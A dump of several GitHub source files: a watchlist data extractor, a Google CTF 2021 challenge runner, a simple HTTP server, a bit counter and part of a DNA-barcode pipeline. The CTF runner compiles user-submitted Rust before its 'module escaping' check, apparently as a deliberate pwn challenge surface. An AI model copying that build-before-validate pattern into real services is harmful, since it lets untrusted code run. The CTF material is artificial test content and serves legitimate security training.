height)","repo_name":"hyungyu-02/PythonStudy_Bj_Army","sub_path":"pyCodes/18111.py","file_name":"18111.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13016855480","text":"import json\nimport logging\nimport re\n\nfrom etl_pipeline.config import pipeline_config\n\ncn = pipeline_config.cn\n\nlogger = logging.getLogger(\"main\").getChild(\"extractor\")\n\n\ndef safe_field_extractor(func):\n def wrap(*args, **kwargs):\n try:\n result = func(*args, **kwargs)\n except Exception as e:\n logger.error(e)\n result = \"\"\n return result\n\n return wrap\n\n\nclass WatchlistExtractor:\n def as_list(self, x):\n if not x:\n return []\n elif isinstance(x, list):\n return x\n else:\n return [x]\n\n @safe_field_extractor\n def parse_dob_dict(self, dob):\n dmy = [\"\", \"\", \"\"]\n result = []\n date_range = []\n for k, v in dob.items():\n if k.upper() == \"Y\":\n dmy[-1] = v\n elif k.upper() == \"M\":\n dmy[1] = v\n elif k.upper() == \"D\":\n dmy[0] = v\n elif k == \"S8_extracted_value\" or k == \"dob\":\n if isinstance(v, str):\n if \" TO \" in v.upper():\n date_range.extend(sorted(re.findall(r\"\\d\\d\\d\\d\", v), key=lambda x: int(x)))\n else:\n result.append(v)\n if isinstance(v, dict):\n result.extend(self.parse_dob_dict(v))\n else:\n result.append(v)\n return result, date_range, dmy\n\n @safe_field_extractor\n def extract_dob(self, record):\n result = []\n entity = record.get(\"entity\", {})\n dobs = entity.get(\"dobs\", [])\n if isinstance(dobs, str):\n return [dobs]\n if not dobs:\n return []\n if not isinstance(dobs, list):\n dobs = [dobs]\n if isinstance(dobs[0], dict):\n for dob in dobs:\n result, date_range, dmy = self.parse_dob_dict(dob)\n result.append(\"/\".join([str(i) for i in dmy if i]))\n if len(date_range) == 2:\n result.extend(\n [str(elem) for elem in range(int(date_range[0]), int(date_range[-1]) + 1)]\n )\n return result\n return \"\"\n\n @safe_field_extractor\n def extract_nationality(self, record):\n result = []\n entry_list = []\n entry = record.get(\"entity\", {}).get(\"nationalities\", {})\n try:\n entry_list.append(entry.get(\"nationality\", \"\"))\n except AttributeError:\n pass\n data_item_list = self.as_list(entry_list)\n for item in data_item_list:\n if type(item) is dict:\n result.append(item.get(\"#text\", item.get(\"text\")))\n else:\n result.append(item)\n return result\n\n @safe_field_extractor\n def extract_citizenships(self, record):\n result = []\n entry_list = []\n entry = record.get(\"entity\", {}).get(\"citizenships\", {})\n try:\n entry_list.append(entry.get(\"citizenship\", \"\"))\n except AttributeError:\n pass\n data_item_list = self.as_list(entry_list)\n for item in data_item_list:\n if type(item) is dict:\n result.append(item.get(\"#text\", item.get(\"text\")))\n else:\n result.append(item)\n return result\n\n @safe_field_extractor\n def extract_wl_data_by_path(self, record, field1, field2):\n entry = record.get(\"entity\", {}).get(field1, {})\n try:\n destination = entry.get(field2, \"\")\n except AttributeError:\n if isinstance(entry, list):\n results = [self.extract_single_array_element(dest[field2]) for dest in entry]\n return results\n else:\n return []\n return self.extract_single_array_element(destination)\n\n @safe_field_extractor\n def extract_single_array_element(self, destination):\n result = []\n entry_list = []\n if isinstance(destination, list):\n entry_list.extend(destination)\n else:\n entry_list.append(destination)\n data_item_list = self.as_list(entry_list)\n\n for item in data_item_list:\n if type(item) is dict:\n result.append(item.get(\"#text\", item.get(\"text\")))\n else:\n result.append(item)\n return result\n\n @safe_field_extractor\n def extract_wl_addresses(self, record):\n result = {}\n addresses = []\n entity = record.get(\"entity\", {})\n if \"addresses\" in entity and \"address\" in entity[\"addresses\"]:\n addresses = self.as_list(record[\"entity\"][\"addresses\"][\"address\"])\n idx = 0\n for item in addresses:\n if type(item) is dict:\n for k, v in item.items():\n full_key = \"WL_\" + k.upper()\n if full_key not in result:\n result[full_key] = []\n result[full_key].append(v)\n else:\n result[\"WL_ADDRESS\" + str(idx)] = item\n idx += 1\n\n return result\n\n @safe_field_extractor\n def extract_wl_routing_codes(self, record):\n routing_codes_dict = {}\n if (\n \"entity\" in record\n and \"routingCodes\" in record[\"entity\"]\n and \"routingCode\" in record[\"entity\"][\"routingCodes\"]\n ):\n routing_codes = self.as_list(record[\"entity\"][\"routingCodes\"][\"routingCode\"])\n if routing_codes:\n if isinstance(routing_codes[0], dict):\n for routing_code in routing_codes:\n key_name = \"WL_ROUTING_CODE_\" + routing_code.get(\n \"@type\", routing_code.get(\"type\")\n ).replace(\" \", \"_\")\n if key_name not in routing_codes_dict:\n routing_codes_dict[key_name] = []\n routing_codes_dict[key_name].append(\n routing_code.get(\"#text\", routing_code.get(\"text\"))\n )\n\n # Convert lists to JSON\n for k, v in routing_codes_dict.items():\n routing_codes_dict[k] = json.dumps(v)\n\n if isinstance(routing_codes[0], list):\n routing_codes_dict = []\n\n return routing_codes_dict\n\n @safe_field_extractor\n def extract_wl_matched_tokens(self, payload):\n input_tokens = []\n for descriptor in payload.get(\"stopDescriptors\", []):\n details = descriptor.get(\"stopDescriptorDetails\", [])\n for detail in details:\n input_tokens.append(detail.get(\"inputToken\", \"\"))\n return {cn.WL_MATCHED_TOKENS: json.dumps(input_tokens)}\n\n @safe_field_extractor\n def extract_country(self, match):\n try:\n address = match.get(\"entity\", {}).get(\"addresses\", {}).get(\"address\")\n except AttributeError:\n address = match.get(\"entity\", {}).get(\"addresses\", {})\n\n if isinstance(address, dict):\n return address.get(\"country\") or address.get(\"address2\")\n elif isinstance(address, list):\n countries = []\n for elem in address:\n countries.append(elem.get(\"country\"))\n countries.append(elem.get(\"address2\"))\n return \"|\".join(list(filter(lambda x: x is not None, countries)))\n\n @safe_field_extractor\n def extract_country_name(self, match):\n try:\n address = match.get(\"entity\", {}).get(\"addresses\", {}).get(\"address\")\n except AttributeError:\n address = match.get(\"entity\", {}).get(\"addresses\", {})\n if isinstance(address, dict):\n return address.get(\"countryName\")\n elif isinstance(address, list):\n countries = []\n for elem in address:\n countries.append(elem.get(\"countryName\"))\n return \"|\".join(list(filter(lambda x: x is not None, countries)))\n\n @safe_field_extractor\n def extract_wlp_type(self, wl_entitytype):\n entity_type_ind = [\"03\"]\n entity_type_pep = [\"07\"]\n entity_type_ind = entity_type_ind + entity_type_pep\n value = \"C\"\n if wl_entitytype in entity_type_ind:\n value = \"I\"\n return {\"WLP_TYPE\": value}\n\n @safe_field_extractor\n def update_match_with_wl_values(self, match):\n wl_record_data = {\n \"SRC_REF_KEY\": match.get(\"uniqueCustomerId\", \"\"),\n \"VERSION_ID\": match.get(cn.MATCH_RECORD_VERSION_ID, \"\"),\n \"ENTITY_ID\": match.get(\"entityId\", \"\"),\n \"ENTITY_VERSION\": match.get(\"entityVersion\", \"\"),\n \"WL_NAME\": match.get(\"entity\", {}).get(\"name\", \"\"),\n \"WL_DOB\": self.extract_dob(match),\n \"WL_ENTITYTYPE\": match.get(\"entityType\", \"\"),\n \"WL_COUNTRY\": self.extract_country(match),\n \"WL_COUNTRYNAME\": self.extract_country_name(match),\n \"WL_NATIONALITY\": self.extract_nationality(match),\n \"WL_CITIZENSHIP\": self.extract_citizenships(match),\n \"WL_POB\": self.extract_wl_data_by_path(match, \"pobs\", \"pob\"),\n \"WL_ALIASES\": self.extract_wl_data_by_path(match, \"aliases\", \"alias\"),\n }\n wl_record_data.update(self.extract_wl_addresses(match))\n wl_record_data.update(self.extract_wl_matched_tokens(match))\n wl_record_data.update(self.extract_wl_routing_codes(match))\n wl_record_data.update(self.extract_wlp_type(wl_record_data[\"WL_ENTITYTYPE\"]))\n\n try:\n wl_record_data[\"WL_DOCUMENT_NUMBER\"] = self.extract_wl_data_by_path(match, \"ids\", \"id\")\n except (KeyError, TypeError):\n wl_record_data[\"WL_DOCUMENT_NUMBER\"] = \"\"\n\n match.update(wl_record_data)\n","repo_name":"ngraczykowski/iris-root","sub_path":"modules/etl-pipeline/etl_pipeline/custom/ms/watchlist_extractor/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41618810481","text":"import os\nimport shutil\nimport subprocess\nimport sys\nimport json\n\ndef socket_print(string):\n print(\"=====\", string, flush=True)\n\n\ndef get_user_input():\n socket_print(\"Enter partial source for edge compute app (EOF to finish):\")\n user_input = []\n while True:\n try:\n line = input()\n except EOFError:\n break\n if line == \"EOF\":\n break\n user_input.append(line)\n socket_print(\"Input accepted!\")\n return user_input\n\n\ndef write_to_rs(contents):\n socket_print(\"Writing source to disk...\")\n rs_prelude = \"\"\"#![no_std]\n use proc_sandbox::sandbox;\n\n #[sandbox]\n pub mod user {\n // BEGIN PLAYER REPLACEABLE SECTION\n \"\"\".splitlines()\n\n with open('/home/user/sources/user-0/src/lib.rs', 'w') as fd:\n fd.write('\\n'.join(rs_prelude))\n fd.write('\\n'.join(contents))\n fd.write(\"\\n}\\n\")\n\ndef check_user_input():\n socket_print(\"Validating user input before compiling...\")\n result = subprocess.run(\"/home/user/rustup/toolchains/nightly-2020-10-08-x86_64-unknown-linux-gnu/bin/rustc user-0/src/lib.rs -Zast-json=yes\", cwd=\"/home/user/sources\", shell=True, timeout=150, capture_output=True)\n try:\n ast = json.loads(result.stdout)\n if len(ast[\"module\"][\"items\"]) != 5:\n socket_print(\"Module escaping detected, aborting.\")\n sys.exit(1)\n\n except json.JSONDecodeError:\n socket_print(\"Something went wrong during validation -- is your input malformed?\")\n sys.exit(1)\n\ndef build_challenge():\n socket_print(\"Building edge compute app...\")\n shutil.copytree(\"/home/user/build-cache\", \"/tmp/chal-build\")\n # `rustc --version` == \"rustc 1.47.0\"\n result = subprocess.run(\"PATH=/usr/bin:$PATH LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu/ CARGO_TARGET_DIR=/tmp/chal-build /usr/bin/cargo build --frozen --offline\", cwd=\"/home/user/sources\", shell=True, timeout=150)\n if result.returncode:\n socket_print(\"non-zero return code on compilation: \" + str(result.returncode))\n sys.exit(1)\n socket_print(\"Build complete!\")\n\n\ndef run_challenge():\n socket_print(\"Testing edge compute app...\")\n result = subprocess.run(\"/tmp/chal-build/debug/server\", shell=True, timeout=10)\n socket_print(\"Test complete!\")\n\n\ndef main():\n user_input = get_user_input()\n write_to_rs(user_input)\n build_challenge()\n\n # Check user input after building since the compilation in check_user_input() will\n # generate errors after generating the ast since the compilation command is\n # incomplete. Let the proper build run first so users can be presented with any\n # compilation issues, then validate it before we actually run.\n check_user_input()\n\n run_challenge()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"google/google-ctf","sub_path":"2021/quals/pwn-memsafety/challenge/chal.py","file_name":"chal.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","stars":4153,"dataset":"github-code","pt":"77"} +{"seq_id":"46275813794","text":"# -*- coding: utf-8 -*-\n\n# Author: Tom Bresee \n#\n# License: BSD 3 clause\n\nfrom .__about__ import (\n __version__,\n)\n\n# this is for \"from import *\"\n__all__ = [\"SVM\",\n \"datasets\",\n \"decision_tree\",\n \"kNN\",\n \"model_evaluation\",\n \"naive_bayes\",\n \"neural_network\",\n ]\n\n# this was originally for _naive_bayes.py and is more widely applicable to other modules\nfrom .datasets import public_dataset\nimport os\nos.environ[\"NLTK_DATA\"] = public_dataset(\"nltk_data_path\")\nos.environ[\"SCIKIT_LEARN_DATA\"] = public_dataset(\"scikit_learn_data_path\")\n","repo_name":"tombresee/wolvr","sub_path":"wolvr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18939130002","text":"#program to count the number of bits in an integer\n\ndef count_bits(num):\n num_bits = 0\n while num:\n num_bits += num & 1\n num >>= 1\n return num_bits\n\noutput = count_bits(7)\nprint(output)\n","repo_name":"pdange21/Elements-of-Programming-in-Python","sub_path":"Chapter_4_Primitive_Types/bit_counter.py","file_name":"bit_counter.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29863626078","text":"import argparse\nfrom datetime import datetime\nimport logging\nimport mimetypes\nimport multiprocessing\nimport os\nimport socket\nimport traceback\nfrom typing import Optional\nfrom urllib.parse import unquote, urlparse\n\nHTTP_PROTOCOL = \"HTTP/1.1\"\nDOCUMENT_ROOT = \"www\"\nMAX_NUM_CONNECTIONS = 5\nCHUNK_SIZE = 1024\nMAX_REQUEST_SIZE = 8192\nCONNETION_TIMEOUT_SEC = 2\nHEADER_END_INDICATOR = \"\\r\\n\\r\\n\"\n\nHTTP_200_OK = 200\nHTTP_400_BAD_REQUEST = 400\nHTTP_403_FORBIDDEN = 403\nHTTP_404_NOT_FOUND = 404\nHTTP_405_METHOD_NOT_ALLOWED = 405\nRESPONSE_CODES = {\n HTTP_200_OK: \"OK\",\n HTTP_400_BAD_REQUEST: \"Bad Request\",\n HTTP_403_FORBIDDEN: \"Forbidden\",\n HTTP_404_NOT_FOUND: \"Not Found\",\n HTTP_405_METHOD_NOT_ALLOWED: \"Method Not Allowed\",\n}\n\n\nclass HTTPRequest:\n methods = (\"GET\", \"HEAD\")\n\n def __init__(self, document_root):\n self.document_root = document_root\n\n def parse(self, request_data):\n lines = request_data.split(\"\\r\\n\")\n try:\n method, url, version = lines[0].split()\n method = method.upper()\n except ValueError:\n return HTTP_400_BAD_REQUEST, \"?\", \"?\", {}\n\n headers = {}\n for line in lines[1:]:\n if not line.split():\n break\n k, v = line.split(\":\", 1)\n headers[k.lower()] = v.strip()\n\n if method not in self.methods:\n return HTTP_405_METHOD_NOT_ALLOWED, method, url, headers\n\n code, path = self.parse_url(url)\n\n return code, method, path, headers\n\n def parse_url(self, url):\n parsed_path = unquote(urlparse(url).path)\n logging.debug(\"Parsed request path: {}\".format(parsed_path))\n path = self.document_root + os.path.abspath(parsed_path)\n\n is_directory = os.path.isdir(path)\n if is_directory:\n if not path.endswith(\"/\"):\n path += \"/\"\n path = os.path.join(path, \"index.html\")\n\n if not is_directory and parsed_path.endswith(\"/\"):\n return HTTP_404_NOT_FOUND, path\n if path.endswith(\"/\") or not os.path.isfile(path):\n return HTTP_404_NOT_FOUND, path\n\n return HTTP_200_OK, path\n\n\nclass HTTPResponse:\n def __init__(self, code, method, path, request_headers):\n self.code = code\n self.method = method\n self.path = path\n self.request_headers = request_headers\n\n def process(self):\n file_size = 0\n content_type = \"text/plain\"\n body = b\"\"\n if self.code == HTTP_200_OK:\n file_size = self.request_headers.get(\n \"content-length\", os.path.getsize(self.path)\n )\n if self.method == \"GET\":\n content_type = mimetypes.guess_type(self.path)[0]\n with open(self.path, \"rb\") as file:\n body = file.read(file_size)\n\n first_line = \"{} {} {}\".format(\n HTTP_PROTOCOL, self.code, RESPONSE_CODES[self.code]\n )\n headers = {\n \"Date\": datetime.now().strftime(\"%a, %d %b %Y %H:%M:%S GMT\"),\n \"Server\": \"Python-edu-server/0.1.0\",\n \"Connection\": \"close\",\n \"Content-Length\": file_size,\n \"Content-Type\": content_type,\n }\n headers = \"\\r\\n\".join(\"{}: {}\".format(k, v) for k, v in headers.items())\n response = (\n \"{}\\r\\n{}{}\".format(first_line, headers, HEADER_END_INDICATOR).encode()\n + body\n )\n return response\n\n\ndef receive(connection):\n fragments = []\n while True:\n try:\n chunk = connection.recv(CHUNK_SIZE).decode()\n except TimeoutError:\n logging.debug(\"Timeout for chunk recieving...\")\n break\n\n if (\n not chunk\n or HEADER_END_INDICATOR in chunk\n or len(fragments) * CHUNK_SIZE >= MAX_REQUEST_SIZE\n ):\n fragments.append(chunk)\n break\n\n fragments.append(chunk)\n request = \"\".join(fragments)\n return request\n\n\ndef handle_request(\n connection: socket.socket, address: tuple, document_root: str\n) -> None:\n try:\n request_data = receive(connection)\n request = HTTPRequest(document_root)\n code, method, path, headers = request.parse(request_data)\n response = HTTPResponse(code, method, path, headers)\n response_data = response.process()\n\n logging.info('\"{} {} {}\" {}'.format(method, path, HTTP_PROTOCOL, code))\n connection.sendall(response_data)\n except:\n logging.exception(\"Error while sending response to {}\".format(address))\n finally:\n logging.debug(\"Closing socket for {}\".format(address))\n connection.close()\n\n\nclass HTTPServer:\n def __init__(\n self,\n host: str = \"localhost\",\n port: int = 8080,\n document_root: str = DOCUMENT_ROOT,\n max_num_connections: int = 0,\n ) -> None:\n self.host = host\n self.port = port\n self.document_root = document_root\n self.max_num_connections = max_num_connections\n\n def run(self) -> None:\n try:\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)\n self.socket.bind((self.host, self.port))\n self.socket.listen(self.max_num_connections)\n except socket.error as e:\n raise RuntimeError(e)\n\n def serve_forever(self) -> None:\n while True:\n client_connection, client_address = self.socket.accept()\n client_connection.settimeout(CONNETION_TIMEOUT_SEC)\n logging.debug(\"Obtain request from {}\".format(client_address))\n handle_request(\n client_connection,\n client_address,\n self.document_root,\n )\n\n\ndef run_server(host: str, port: int, workers: int, document_root: str):\n logging.info(\n \"Starting server at http://{}:{} with root dir - {}\".format(\n host, port, document_root\n )\n )\n server = HTTPServer(host, port, document_root)\n server.run()\n\n processes = []\n try:\n for _ in range(workers):\n process = multiprocessing.Process(target=server.serve_forever)\n processes.append(process)\n process.start()\n logging.debug(\"Worker with id {} was started\".format(process.pid))\n for process in processes:\n process.join()\n except KeyboardInterrupt:\n for process in processes:\n if process:\n process.terminate()\n logging.debug(\"Worker with id {} was terminated\".format(process.pid))\n\n\ndef init_logging_config(filename: Optional[str] = None, level: str = \"INFO\") -> None:\n try:\n logging.basicConfig(\n filename=filename,\n filemode=\"a\",\n format=\"[%(asctime)s] %(levelname).1s %(message)s\",\n datefmt=\"%Y.%m.%d %H:%M:%S\",\n level=getattr(logging, level),\n )\n except TypeError:\n logging.error(\"Error initializing the logging system\")\n traceback.print_stack()\n return False\n\n return True\n\n\ndef parse_arguments() -> argparse.Namespace:\n parser = argparse.ArgumentParser(description=\"Basic http server\")\n\n parser.add_argument(\"-s\", \"--host\", type=str, default=\"127.0.0.1\", help=\"Hostname\")\n parser.add_argument(\"-p\", \"--port\", type=int, default=8080, help=\"Port number\")\n parser.add_argument(\n \"-w\", \"--workers\", type=int, default=5, help=\"Number of workers\"\n )\n parser.add_argument(\n \"-r\",\n \"--root\",\n type=str,\n default=DOCUMENT_ROOT,\n help=\"Files root directory (DOCUMENT_ROOT)\",\n )\n parser.add_argument(\n \"-d\", \"--debug\", action=\"store_true\", help=\"Show debug messages\"\n )\n\n args = parser.parse_args()\n return args\n\n\nif __name__ == \"__main__\":\n args = parse_arguments()\n if args.debug:\n init_logging_config(level=\"DEBUG\")\n else:\n init_logging_config(level=\"INFO\")\n run_server(args.host, args.port, args.workers, args.root)\n","repo_name":"shevelsm/otus-python-pro","sub_path":"hw4-otuserver/httpd.py","file_name":"httpd.py","file_ext":"py","file_size_in_byte":8168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"469546916","text":"import glob\nimport gzip\nimport logging\nimport math\nimport os\nimport subprocess\nimport sys\nimport traceback\n\nfrom configparser import ConfigParser\nfrom collections import defaultdict\n\nimport pandas as pd\nimport numpy as np\nfrom natsort import natsorted\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport scipy\n\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\n\nfrom kneed import KneeLocator\n\nfrom scipy.sparse import csr_matrix\nfrom scipy.sparse.csgraph import connected_components\n\nfrom mapseq.utils import dataframe_to_seqlist, write_fasta_from_df, remove_base_repeats\nfrom mapseq.utils import run_command_shell, NonZeroReturnException, merge_dfs \nfrom mapseq.utils import merge_tsvs, setup_logging\nfrom mapseq.utils import JobRunner, JobStack, JobSet\n\nfrom mapseq.bowtie import run_bowtie, make_bowtie_df\n\nfrom mapseq.barcode import *\n\ndef fix_columns_int(df, columns):\n '''\n forces column in dataframe to be an integer. NaNs become '0'\n Only floating points can be NaN. No good solution for integers...\n '''\n for col in columns:\n try:\n logging.debug(f'trying to fix col {col}')\n fixed = np.array(df[col], np.int16)\n logging.debug(f'fixed=\\n{fixed}')\n df[col] = fixed\n \n except ValueError:\n logging.debug(f'invalid literal in {col}')\n return df\n\ndef fix_columns_str(df, columns):\n '''\n forces column in dataframe to be string NaNs become ''\n '''\n for col in columns:\n try:\n logging.debug(f'trying to fix col {col}')\n df[col].replace(0,'',inplace=True)\n df[col].replace(np.nan,'', inplace=True)\n \n except Exception as ex:\n logging.error(f'error while handling {col} ')\n logging.warning(traceback.format_exc(None))\n return df\n\n\ndef get_default_config():\n dc = os.path.expanduser('~/git/mapseq-processing/etc/mapseq.conf')\n cp = ConfigParser()\n cp.read(dc)\n return cp\n\n\ndef get_rtlist(sampledf):\n rtlist = list(sampledf['rtprimer'].dropna())\n nrtlist = []\n for x in rtlist:\n try:\n y = int(x)\n nrtlist.append(y)\n except ValueError:\n logging.debug(f'ignoring bad int() input.')\n \n #rtlist = [int(x) for x in rtlist]\n \n nrtlist = [f'BC{x}' for x in nrtlist]\n return nrtlist\n\n\ndef package_pairfiles(infiles):\n '''\n pack up input list of elements into list of paired tuples. \n ['a','b','c','d'] -> [('a','b'),('c','d')]\n\n '''\n if len(infiles) %2 != 0:\n logging.error(f'number of elements must be multiple of two!')\n \n infilelist = []\n a = None\n b = None\n for i,v in enumerate(infiles):\n if i % 2 == 0:\n a = v\n else:\n b = v\n t = (a,b)\n logging.info(f'input pair of readfiles: r1={a} r2={b}')\n infilelist.append(t)\n return infilelist\n\n\ndef guess_site(infile, sampdf):\n '''\n will look at filename and try to guess rt primer number, then \n look for siteinfo in sampledf\n \n NOTE: assumes BC.fasta or SSI.fasta and identifiers\n consist of digits. \n \n '''\n logging.info(f'guessing site/brain/region for FASTA file {infile}')\n filepath = os.path.abspath(infile) \n dirname = os.path.dirname(filepath)\n filename = os.path.basename(filepath)\n (base, ext) = os.path.splitext(filename) \n head = base.split('.')[0]\n rtprimer_num = ''.join(i for i in head if i.isdigit())\n rtprimer_num = int(rtprimer_num)\n logging.debug(f'base={base} head={head} guessing rtprimer={rtprimer_num} sampdf=\\n{sampdf}')\n \n df = sampdf[sampdf['rtprimer'] == rtprimer_num]\n df.reset_index(inplace=True, drop=True)\n site = None\n if len(df)> 0:\n try:\n site = df['siteinfo'][0]\n except:\n logging.warning(f'unable to get siteinfo for {infile}')\n site = 'target' # default to target. \n \n try: \n brain = df['brain'][0]\n except:\n logging.warning(f'unable to get brain info for {infile}')\n brain = '1'\n\n try: \n region = df['region'][0]\n except:\n logging.warning(f'unable to get region info for {infile}')\n region = str(rtprimer_num) # default to SSI label \n \n logging.debug(f'got site={site} brain={brain} region={region} for rtprimer={rtprimer_num}') \n\n logging.debug(f'got site={site} for rtprimer guessed from {infile}')\n return (rtprimer_num, site, brain, region )\n \n \n \ndef process_ssifasta(config, infile, outdir=None, site=None):\n '''\n by default, outdir will be same dir as infile\n assumes infile fasta has already been trimmed to remove SSI\n \n site = ['target-control','injection-control','target','target-negative',target-lone'] \n Will use relevant threshold. If None, will use default threshold\n \n '''\n aligner = config.get('ssifasta','tool')\n \n filepath = os.path.abspath(infile) \n dirname = os.path.dirname(filepath)\n if outdir is not None:\n dirname = outdir\n \n filename = os.path.basename(filepath)\n (base, ext) = os.path.splitext(filename) \n logging.debug(f'handling {filepath} base={base}')\n \n # make raw fasta TSV of barcode-splitter output for one barcode. \n # trim to 44 nt since we know last 8 are SSI \n logging.debug('calc counts...')\n seqdf = make_fasta_df(config, infile)\n of = os.path.join(dirname , f'{base}.44.seq.tsv')\n seqdf.to_csv(of, sep='\\t')\n \n # to calculate threshold we need counts calculated. \n cdf = make_counts_df(config, seqdf, label=base) \n logging.debug(f'initial counts df {len(cdf)} all reads.')\n # these are ***READ*** counts\n of = os.path.join(dirname , f'{base}.44.counts.tsv')\n cdf.to_csv(of, sep='\\t') \n \n threshold = get_threshold(config, cdf, site)\n logging.debug(f'got threshold={threshold} for site {site}')\n tdf = threshold_counts(config, cdf, threshold=threshold)\n logging.info(f'at threshold={threshold} {len(tdf)} unique molecules.')\n \n # thresholded raw counts. duplicates are all one UMI, so set counts to 1. \n # each row (should be) a distinct UMI, so trim to 32. \n tdf['counts'] = 1 \n tdf['sequence'] = tdf['sequence'].str[:32]\n \n # this contains duplicate VBCs with *different* UMIs\n of = os.path.join(dirname , f'{base}.32.seq.tsv')\n tdf.to_csv(of, sep='\\t') \n \n # now have actual viral barcode df with *unique molecule counts.*\n vbcdf = make_counts_df(config, tdf)\n of = os.path.join(dirname , f'{base}.32.counts.tsv')\n vbcdf.to_csv(of, sep='\\t') \n \n # split out spike, real, lone, otherwise same as 32.counts.tsv \n #spikedf, realdf, lonedf = split_spike_real_lone_barcodes(config, vbcdf)\n spikedf, realdf, lonedf = split_spike_real_lone_barcodes(config, vbcdf)\n \n # write out this step...\n realdf.to_csv(os.path.join(dirname , f'{base}.real.counts.tsv'), sep='\\t')\n lonedf.to_csv(os.path.join(dirname , f'{base}.lone.counts.tsv'), sep='\\t')\n spikedf.to_csv(os.path.join(dirname , f'{base}.spike.counts.tsv'), sep='\\t')\n\n # remove homopolymers in real sequences.\n max_homopolymer_run=int(config.get('ssifasta', 'max_homopolymer_run')) \n realdf = remove_base_repeats(realdf, col='sequence', n=max_homopolymer_run)\n \n # align and collapse all. \n acrealdf = align_and_collapse(config, realdf, dirname, base, 'real')\n acspikedf = align_and_collapse(config, spikedf, dirname, base, 'spike')\n aclonedf = align_and_collapse(config, lonedf, dirname, base, 'lone')\n \n acrealdf.to_csv(os.path.join(dirname , f'{base}.real.tsv'), sep='\\t')\n acspikedf.to_csv(os.path.join(dirname , f'{base}.spike.tsv'), sep='\\t')\n aclonedf.to_csv(os.path.join(dirname , f'{base}.lone.tsv'), sep='\\t')\n\n # add labels for merging...\n acrealdf['type'] = 'real'\n acspikedf['type'] = 'spike'\n aclonedf['type'] = 'lone'\n\n outdf = merge_dfs([ acrealdf, acspikedf, aclonedf ])\n outdf['label'] = base\n outdf.sort_values(by = ['type', 'counts'], ascending = [True, False], inplace=True)\n outdf.reset_index(drop=True, inplace=True)\n return outdf\n\n\ndef align_and_collapse(config, countsdf, outdir, base, label):\n '''\n countsdf 'sequence' and 'counts' columns\n outdir working dir or temp dir. \n base leading file name, e.g. barcode label, e.g. 'SSI4'\n label type of sequence, e.g. real, spike, L1 (lone)\n \n '''\n newdf = None\n logging.debug(f'handling {base} {label}s...')\n aligner = config.get('ssifasta','tool')\n logging.info(f'{label} {len(countsdf)} sequences, representing {countsdf.counts.sum()} reads.') \n of = os.path.join( outdir , f'{base}.{label}.seq.fasta')\n logging.debug(f'make fasta for {aligner} = {of}') \n seqfasta = write_fasta_from_df(config, countsdf, outfile=of)\n of = os.path.join(outdir , f'{base}.{label}.{aligner}')\n logging.debug(f'running {aligner}...')\n try:\n afile = run_bowtie(config, seqfasta, of, tool=aligner ) \n logging.debug(f'handle {aligner} align file: {afile}')\n btdf = make_bowtie_df(afile)\n of = os.path.join(outdir , f'{base}.{label}.btdf.tsv')\n btdf.to_csv(of, sep='\\t') \n edgelist = edges_from_btdf(btdf)\n components = get_components(edgelist)\n logging.debug(f'countdf columns are {countsdf.columns}')\n newdf = collapse_counts_df(countsdf, components)\n logging.debug(f'orig len={len(countsdf)}, {len(components)} components, collapsed len={len(newdf)}')\n\n except NonZeroReturnException:\n logging.warning(f'NonZeroReturn Exception. Probably no {label}s found. ')\n newdf = pd.DataFrame(columns = ['sequence','counts'])\n return newdf\n\n\ndef max_hamming(sequence, sequencelist):\n '''\n calculates maximum mismatch between sequence and all sequences in sequencelist. \n assumes all sequences are same length\n no indels, just substitutions. \n '''\n #logging.debug(f'seq={sequence}')\n #logging.debug(f'sequencelist={sequencelist}')\n max_dist = 0\n for s in sequencelist:\n dist = 0\n for i in range(0,len(s)):\n if sequence[i] != s[i]:\n dist += 1\n if dist > max_dist:\n max_dist = dist\n return max_dist\n\n\ndef unique_df(seqdf):\n '''\n filters for only unique sequences, sets counts to 1\n '''\n pass\n\n\n\ndef collapse_counts_df(countsdf, components):\n '''\n takes components consisting of indices\n determines sequence with largest count columns: 'sequence', 'counts'\n collapses all other member components to the sequence of the largest.\n adds their counts to that of that sequence.\n retain columns and values for highest counts row. \n \n '''\n # list of lists to collect values..\n logging.debug(f'collapsing countsdf len={len(countsdf)} w/ {len(components)} components.')\n lol = []\n colnames = list(countsdf.columns)\n for component in components:\n logging.debug(f'component={component}')\n # make new df of only component sequence rows\n cdf = countsdf.iloc[component].reset_index(drop=True)\n logging.debug(f'cdf=\\n{cdf}')\n # which sequence has highest count?\n maxid = cdf.counts.idxmax()\n # extract sequence and count as python list\n row = list(cdf.iloc[maxid])\n # set counts as sum of all collapse sequences. \n row[1] = cdf.counts.sum()\n lol.append(row)\n \n if logging.getLogger().level <= logging.DEBUG:\n slist = list(cdf['sequence'])\n logging.debug(f'slist={slist}')\n if len(slist) > 1:\n s = row[0]\n maxdiff = max_hamming(s, slist)\n logging.debug(f'max_hamming = {maxdiff} n_seqs={len(slist)}')\n else:\n logging.debug(f'skip distance calc, one sequence in component.')\n \n newdf = pd.DataFrame(data=lol, columns=colnames)\n logging.debug(f'original len={len(countsdf)} collapsed len={len(newdf)}')\n newdf.sort_values('counts',ascending=False, inplace=True)\n newdf.reset_index(drop=True, inplace=True)\n return newdf\n\n\ndef edges_from_btdf(btdf):\n readlist = btdf.name_read.values.tolist()\n alignlist = btdf.name_align.values.tolist() \n edgelist = 